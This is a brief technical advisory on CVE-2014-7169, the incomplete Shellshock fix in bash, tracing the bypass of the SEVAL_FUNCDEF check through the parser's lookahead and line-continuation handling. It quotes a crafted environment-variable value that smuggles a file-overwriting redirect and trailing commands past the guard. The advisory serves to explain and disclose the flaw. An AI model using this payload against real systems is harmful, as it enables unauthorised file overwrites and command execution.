CVE-2014-7169: Bash incomplete Shellshock fix — SEVAL_FUNCDEF bypassed via parser lookahead and line-continuation

CVE-2014-7169 is an incomplete fix for Shellshock (CVE-2014-6271) in bash-4.3-p25. The bash function import mechanism in initialize_shell_variables (variables.c:395) calls parse_and_execute with SEVAL_FUNCDEF|SEVAL_ONECMD flags to safely import functions from environment variables. However, the SEVAL_FUNCDEF validation in evalstring.c (lines 364-383) is insufficient: it checks parser_remaining_input() which only inspects the shell_input_line buffer, NOT the yacc parser's lookahead register (yychar). A crafted env var like BASH_FUNC_X%%='() { (a)=>\' with a trailing backslash triggers the lexer's line-continuation mechanism (shell_getc goto restart_read, parse.y:2581), causing the parser to read beyond the function definition string and consume characters from the shell's next available input stream. The > redirect inside the malformed function body is then applied (creating/overwriting a file), and trailing commands (date) from the consumed input run with stdout redirected — all bypassing the SEVAL_FUNCDEF guard. CVE class: command-injection via incomplete security check on parser state after untrusted input parsing.